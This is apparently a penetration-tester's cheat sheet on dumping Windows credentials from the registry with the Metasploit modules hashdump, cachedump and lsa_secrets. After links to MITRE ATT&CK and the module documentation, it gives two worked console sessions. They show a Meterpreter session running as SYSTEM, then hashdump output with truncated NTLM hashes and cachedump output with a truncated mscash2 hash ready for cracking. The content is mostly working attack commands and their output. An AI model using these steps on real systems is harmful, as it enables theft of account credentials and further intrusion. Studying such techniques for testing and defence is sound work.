======================================================================================================================
OS Credential Dumping (Registry) using Metasploit modules 'hashdump', 'cachedump' and 'lsa_secrets'
======================================================================================================================

Usefull links: 
> https://attack.mitre.org/techniques/T1003/002/
> https://attack.mitre.org/techniques/T1003/004/
> https://attack.mitre.org/techniques/T1003/005/

Metasploit 
===========
1. Hashdump module
   > https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/gather/hashdump.md
2. Cachedump module
   > https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/gather/cachedump.md
3. Lsa_secrets module 
   > https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/gather/lsa_secrets.md

Note: These modules of Metasploit are detected/flagged by many AV solutions including Windows Defender.


---------------------------------------------------------------------------------------------------------------------
Example 1. Use the module 'hashdump' of metasploit to dump the Windows password hashes stored in the registry hives 
           of a target Windows computer
---------------------------------------------------------------------------------------------------------------------

[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.4:1079) at 2021-04-05 06:56:45 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7<snip>
alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04<snip>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0<snip>
HelpAssistant:1000:a03299a993da915ca9d82696d8625873:a8976221dea345e51ba030d<snip>
pentester:1004:1e99d771a164613ab6cb882f20962373:fe4b8e9e7da90982005360caf7a<snip>
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:198b84b154680454ed6c<snip>
<SNIP> 


---------------------------------------------------------------------------------------------------------------------
Example 2. Use the module 'cachedump' of metasploit to dump the Windows cached passwords stored in the registry hives 
           of a target Windows computer
---------------------------------------------------------------------------------------------------------------------

[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.4:1079) at 2020-04-05 06:56:45 +0200

msf > use post/windows/gather/cachedump
msf post(windows/gather/cachedump) > set SESSION 1
  SESSION => 1
msf post(windows/gather/cachedump) > run

  [*] Executing module against LAPTOP2
  [*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
  [*] Obtaining boot key...
  [*] Obtaining Lsa key...
  [*] Vista or above system
  [*] Obtaining NL$KM...
  [*] Dumping cached credentials...
  [*] Hash are in MSCACHE_VISTA format. (mscash2)
  [+] MSCACHE v2 saved in: /root/.msf4/loot/20201211134214_default_192.168.1.4_mscache2.creds_626318.txt
  [*] John the Ripper format:
  # mscash2
  administrator:$DCC2$10240#administrator#89f253291a4b53a41c94<snip>

  [*] Post module execution completed
